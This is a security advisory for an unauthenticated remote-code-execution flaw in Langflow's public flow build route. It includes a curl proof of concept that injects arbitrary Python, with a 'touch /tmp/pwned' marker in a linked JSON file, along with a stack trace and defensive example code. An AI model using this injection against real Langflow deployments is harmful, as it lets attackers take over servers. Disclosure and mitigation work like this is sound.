GHSA-V5FF-9Q35-Q26F
Vulnerability from github – Published: 2026-06-16 17:35 – Updated: 2026-06-16 17:35
Summary
The "Shareable Playground" (or "Public Flows" in code) contains a critical RCE vulnerability. Simply sharing a flow exposes the deployment to RCE risk by authenticated users.
Tested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe
Details
The Shareable Playground feature works by letting unauthenticated users execute a workflow by accessing a link.
Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID.
When the route executes the flow, it accepts arbitrary custom Python code as the node's code, supplied inside the JSON payload!
The vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.
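The field path above is the whole problem: the build route takes the component code from the request body rather than from the flow that was actually shared. The following added example (illustrative code written for this page, not Langflow's own code or API) shows the server-side check a maintainer would want: compare the submitted payload with the flow stored server-side, reject or log any node whose code exists only in the request, and, for a hardened variant, overwrite the client's code fields with the stored ones before anything is instantiated. The helper names and the sample payloads are constructed for the example; only the field path comes from the advisory.

```python
"""Added example (not Langflow's code): refuse client-supplied component code
when building a public flow.

The advisory's point is that the unauthenticated build route instantiates
components from code carried in the request body
(data.nodes[X].data.node.template.code.value) instead of from the flow that
was shared.  The helpers below compare a request payload with the flow stored
server-side; helper names and the sample payloads are constructed for this
example and are not part of the project's API.
"""
import copy
from typing import Any


def _nodes_by_id(flow: dict[str, Any]) -> dict[str, dict[str, Any]]:
    """Index a flow's nodes by their id."""
    return {n.get("id"): n for n in flow.get("data", {}).get("nodes", [])}


def _code_value(node: dict[str, Any]) -> Any:
    """Return the template code value of a node, or None if it has none."""
    template = node.get("data", {}).get("node", {}).get("template", {})
    code = template.get("code")
    return code.get("value") if isinstance(code, dict) else None


def find_tampered_code(stored_flow: dict[str, Any], client_payload: dict[str, Any]) -> list[str]:
    """IDs of submitted nodes whose code is not exactly what the stored flow holds.

    This includes nodes the stored flow does not know at all: for an
    unauthenticated caller, any code that exists only in the request is a
    reason to reject the build (and to log the attempt).
    """
    stored = _nodes_by_id(stored_flow)
    tampered = []
    for node in client_payload.get("data", {}).get("nodes", []):
        node_id = node.get("id")
        submitted = _code_value(node)
        if submitted is None:
            continue  # nothing executable submitted for this node
        if node_id not in stored or _code_value(stored[node_id]) != submitted:
            tampered.append(node_id)
    return tampered


def sanitize_payload(stored_flow: dict[str, Any], client_payload: dict[str, Any]) -> dict[str, Any]:
    """Copy of client_payload with every code field replaced by the stored one.

    Unknown nodes are dropped; for known nodes the client's code is overwritten
    by the stored component code (or removed if the stored node has none), so
    only code the flow owner actually saved can reach the component loader.
    """
    stored = _nodes_by_id(stored_flow)
    clean = copy.deepcopy(client_payload)
    kept = []
    for node in clean.get("data", {}).get("nodes", []):
        stored_node = stored.get(node.get("id"))
        if stored_node is None:
            continue
        template = (node.setdefault("data", {}).setdefault("node", {})
                    .setdefault("template", {}))
        stored_template = stored_node.get("data", {}).get("node", {}).get("template", {})
        if isinstance(stored_template.get("code"), dict):
            template["code"] = copy.deepcopy(stored_template["code"])
        else:
            template.pop("code", None)
        kept.append(node)
    clean.setdefault("data", {})["nodes"] = kept
    return clean


def _node(node_id: str, code: str) -> dict[str, Any]:
    """Build a minimal node in the shape the advisory names (constructed sample)."""
    return {"id": node_id,
            "data": {"node": {"template": {"code": {"type": "code", "value": code}}}}}


# Constructed sample data: the flow as saved by its owner, and a request whose
# body carries different code for the same node plus a node the flow never had.
STORED_FLOW = {"data": {"nodes": [
    _node("ChatInput-syEJp", "class ChatInput(Component):\n    pass\n"),
]}}
TAMPERED_PAYLOAD = {"data": {"nodes": [
    _node("ChatInput-syEJp", "print('code that exists only in the request')"),
    _node("Extra-0000", "print('node that exists only in the request')"),
]}}

if __name__ == "__main__":
    print(find_tampered_code(STORED_FLOW, TAMPERED_PAYLOAD))  # ['ChatInput-syEJp', 'Extra-0000']
    clean = sanitize_payload(STORED_FLOW, TAMPERED_PAYLOAD)
    print(find_tampered_code(STORED_FLOW, clean))  # []
```

The detection function is what a reviewer would wire into request logging for the public route, and the sanitizer is the stricter fix: on an unauthenticated build the request body should at most select which stored flow to run, never supply the code that runs.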
PoC
Reproduction:
1. Create a new flow and add a Chat Input node to it
2. Share the flow ("Shareable Playground")
3. Access the public link with the browser developer tools open and execute the flow.
4. Find the /api/v1/build_public_tmp route and copy as cURL
5. Edit the data.nodes[X].data.node.template.code.value JSON field with any Python code and run the cURL command.
Example PoC (replace the flow ID with the correct one), and download test_with_python.json (https://github.com/user-attachments/files/25159927/test_with_python.json):
curl 'http://localhost:7860/api/v1/build_public_tmp/<flow-id>/flow?start_component_id=ChatInput-syEJp&log_builds=false&event_delivery=streaming' \
-H 'Content-Type: application/json' \
-b 'client_id=anything' \
--data-raw "$(cat test_with_python.json)"
Search for touch /tmp/pwned in test_with_python.json and replace it with any other code.
The stacktrace for the code executed is:
...
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 495, in generate_flow_events
ids, vertices_to_run, graph = await build_graph_and_get_order()
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 234, in build_graph_and_get_order
graph = await create_graph(fresh_session, flow_id_str, flow_name)
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 298, in create_graph
return await build_graph_from_data(
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py", line 192, in build_graph_from_data
graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get("user_id"))
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1153, in from_payload
graph.add_nodes_and_edges(vertices, edges)
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 270, in add_nodes_and_edges
self.initialize()
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 512, in initialize
self._build_graph()
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1305, in _build_graph
self._instantiate_components_in_vertices()
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1347, in _instantiate_components_in_vertices
vertex.instantiate_component(self.user_id)
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py", line 382, in instantiate_component
self.custom_component, _ = initialize.loading.instantiate_class(
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py", line 45, in instantiate_class
custom_component: CustomComponent | Component = class_object(
File "<string>", line 59, in __init__
Impact
Unauthenticated RCE on any deployment with a shareable playground.
Ori Lahav
Security Researcher @ Rubrik Inc.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.9.1"
},
"package": {
"ecosystem": "PyPI",
"name": "langflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48519"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T17:35:32Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nThe \"Shareable Playground\" (or \"Public Flows\" in code) contains a critical RCE vulnerability.\nSimply sharing a flow exposes the deployment to RCE risk by authenticated users.\n\nTested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe\n\n### Details\nShareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link.\nSpecifically, it enables the route `/api/v1/build_public_tmp` to execute any public flow, given a public flow ID.\nWhen the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload!\n\nThe vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.\n\n### PoC\nReproduction:\n1. Create a new flow and add a Chat Input node to it\n2. Share the flow (\"Shareable Playground\")\n3. Access the public link with the browser developers tools open and execute the flow.\n4. Find the `/api/v1/build_public_tmp` route and copy as cURL\n5. Edit the `data.nodes[X].data.node.template.code.value` JSON field with any python code and run the cURL command.\n\nExample PoC (replace flow ID with the correct one), and download [test_with_python.json](https://github.com/user-attachments/files/25159927/test_with_python.json):\n```bash\ncurl \u0027http://localhost:7860/api/v1/build_public_tmp/\u003cflow-id\u003e/flow?start_component_id=ChatInput-syEJp\u0026log_builds=false\u0026event_delivery=streaming\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -b \u0027client_id=anything\u0027 \\\n --data-raw \"$(cat test_with_python.json)\"\n```\nSearch for `touch /tmp/pwned` in the `test_with_python.json` and edit for any other code.\n\n\n\nThe stacktrace for the code executed is:\n```\n...\n File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 495, in generate_flow_events\n ids, vertices_to_run, graph = await build_graph_and_get_order()\n File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 234, in build_graph_and_get_order\n graph = await create_graph(fresh_session, flow_id_str, flow_name)\n File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 298, in create_graph\n return await build_graph_from_data(\n File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py\", line 192, in build_graph_from_data\n graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get(\"user_id\"))\n File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1153, in from_payload\n graph.add_nodes_and_edges(vertices, edges)\n File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 270, in add_nodes_and_edges\n self.initialize()\n File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 512, in initialize\n self._build_graph()\n File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1305, in _build_graph\n self._instantiate_components_in_vertices()\n File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1347, in _instantiate_components_in_vertices\n vertex.instantiate_component(self.user_id)\n File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py\", line 382, in instantiate_component\n self.custom_component, _ = initialize.loading.instantiate_class(\n File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py\", line 45, in instantiate_class\n custom_component: CustomComponent | Component = class_object(\n File \"\u003cstring\u003e\", line 59, in __init__\n```\n\n### Impact\nUnauthenticated RCE on any deployment with a shareable playground.\n\n\n\nOri Lahav\nSecurity Researcher @ Rubrik Inc.",
"id": "GHSA-v5ff-9q35-q26f",
"modified": "2026-06-16T17:35:32Z",
"published": "2026-06-16T17:35:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
},
{
"type": "PACKAGE",
"url": "https://github.com/langflow-ai/langflow"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Langflow: Unauthenticated RCE in Shareable Playgrounds"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.